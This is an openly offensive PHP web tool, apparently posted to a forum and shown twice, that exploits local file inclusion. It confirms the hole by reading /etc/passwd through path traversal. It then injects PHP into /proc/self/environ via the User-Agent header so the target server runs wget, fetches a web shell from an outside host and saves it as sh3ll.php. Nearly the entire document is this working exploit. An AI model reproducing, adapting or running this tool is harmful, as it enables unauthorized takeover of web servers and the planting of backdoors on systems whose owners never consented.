[align=LEFT][php]
<html>
<head>
<title>Simple LFI Sh3ll Uploader</title>
<style type="****/css">
**** {
background-color: #000000;
font-family:"Courier New";
color: silver;
font-size:11px;
}
input {
background-color: #000000;
font-family:"Courier New";
color: silver;
font-size:11px;
border:1px solid;
border-color:silver;
}
</style>
</head>
<****>
<h3>Simple LFI Sh3ll Uploader</h3>
<form method="post" action="">
LFI URL: <input type="****" size="60" ****="lfiurl" value="">
<input type="submit" value="Fvck that!">
</form>
<?php
if($_POST['lfiurl']) {
print "<pre>";
$target = $_POST['lfiurl'];
$testlfi = "../../../../../../../../../../../../../../../etc/passwd%00";
$readenv = "../../../../../../../../../../../../../../../proc/self/environ%00";
$mbooh = preg_split("/.php/", $target);
$pecah = preg_split("/\//", $mbooh[0]);
$path = "/";
$azz = count($pecah) - 1;
for($g = 3; $g<$azz;$g++) {
$path.= $pecah[$g]."/";
}
$bug = $pecah[$azz].".php".$mbooh[1];
$host = $pecah[2];
print "[+] Testing LFI ... ";
flush();
$res = FetchURL($target.$testlfi);
if(preg_match("/root:x:0:0/", $res)) {
print "<font color='green'>Ok</font><br>[+] Reading /proc/self/environ ... ";
flush();
$rez = FetchURL($target.$readenv);
if(preg_match("/********_ROOT=/", $rez)) {
print "<font color='green'>Ok</font><br>[+] Exploiting target ... <br>";
flush();
$cmd = "<?php system('wget http://www.dallasdesigngroup.com/UserFiles/sh3ll.txt -O sh3ll.php');?>";
$soket = fsockopen($host, 80);
$req = "GET ".$path.$bug.$readenv." HTTP/1.0\r\nHost: ".$host."\r\nAccept: */*\r\nUser-Agent: ".$cmd."\r\n\r\n";
fputs($soket, $req);
fclose($soket);
flush();
$cek = FetchURL("http://".$host.$path."sh3ll.php");
if(preg_match("/gblack Was Here/", $cek)) {
print "[+] Exploit successful!<br>[+] Shell uploaded to <font color='green'>http://".$host.$path."sh3ll.php</font>";
} else {
print "<font color='red'>[!] Exploit failed!</font><br>";
}
}
else {
print "<font color='red'>Failed</font><br>";
}
} else {
print "<font color='red'>Failed</font><br>";
}
}
function FetchURL($url) {
$ch = curl_init();
curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/3.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.20) Gecko/20081217 Firefox/2.0.0.20 (.NET CLR 3.5.30729)");
curl_setopt($ch, CURLOPT_FOLLOW********, 1);
curl_setopt($ch, CURLOPT_HEADER, 1);
curl_setopt($ch, CURLOPT_URL, $url);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_TIMEOUT, 30);
$data = curl_exec($ch);
if(!$data) {
return false;
}
return $data;
}
?>
<br>
Copyleft © 2010 by gblack
</****>
</html>
[/php][/align]
<html>
<head>
<title>Simple LFI Sh3ll Uploader</title>
<style type="****/css">
**** {
background-color: #000000;
font-family:"Courier New";
color: silver;
font-size:11px;
}
input {
background-color: #000000;
font-family:"Courier New";
color: silver;
font-size:11px;
border:1px solid;
border-color:silver;
}
</style>
</head>
<****>
<h3>Simple LFI Sh3ll Uploader</h3>
<form method="post" action="">
LFI URL: <input type="****" size="60" ****="lfiurl" value="">
<input type="submit" value="Fvck that!">
</form>
<?php
if($_POST['lfiurl']) {
print "<pre>";
$target = $_POST['lfiurl'];
$testlfi = "../../../../../../../../../../../../../../../etc/passwd%00";
$readenv = "../../../../../../../../../../../../../../../proc/self/environ%00";
$mbooh = preg_split("/.php/", $target);
$pecah = preg_split("/\//", $mbooh[0]);
$path = "/";
$azz = count($pecah) - 1;
for($g = 3; $g<$azz;$g++) {
$path.= $pecah[$g]."/";
}
$bug = $pecah[$azz].".php".$mbooh[1];
$host = $pecah[2];
print "[+] Testing LFI ... ";
flush();
$res = FetchURL($target.$testlfi);
if(preg_match("/root:x:0:0/", $res)) {
print "<font color='green'>Ok</font><br>[+] Reading /proc/self/environ ... ";
flush();
$rez = FetchURL($target.$readenv);
if(preg_match("/********_ROOT=/", $rez)) {
print "<font color='green'>Ok</font><br>[+] Exploiting target ... <br>";
flush();
$cmd = "<?php system('wget http://www.dallasdesigngroup.com/UserFiles/sh3ll.txt -O sh3ll.php');?>";
$soket = fsockopen($host, 80);
$req = "GET ".$path.$bug.$readenv." HTTP/1.0\r\nHost: ".$host."\r\nAccept: */*\r\nUser-Agent: ".$cmd."\r\n\r\n";
fputs($soket, $req);
fclose($soket);
flush();
$cek = FetchURL("http://".$host.$path."sh3ll.php");
if(preg_match("/gblack Was Here/", $cek)) {
print "[+] Exploit successful!<br>[+] Shell uploaded to <font color='green'>http://".$host.$path."sh3ll.php</font>";
} else {
print "<font color='red'>[!] Exploit failed!</font><br>";
}
}
else {
print "<font color='red'>Failed</font><br>";
}
} else {
print "<font color='red'>Failed</font><br>";
}
}
function FetchURL($url) {
$ch = curl_init();
curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/3.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.20) Gecko/20081217 Firefox/2.0.0.20 (.NET CLR 3.5.30729)");
curl_setopt($ch, CURLOPT_FOLLOW********, 1);
curl_setopt($ch, CURLOPT_HEADER, 1);
curl_setopt($ch, CURLOPT_URL, $url);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_TIMEOUT, 30);
$data = curl_exec($ch);
if(!$data) {
return false;
}
return $data;
}
?>
<br>
Copyleft © 2010 by gblack
</****>
</html>
[/php][/align]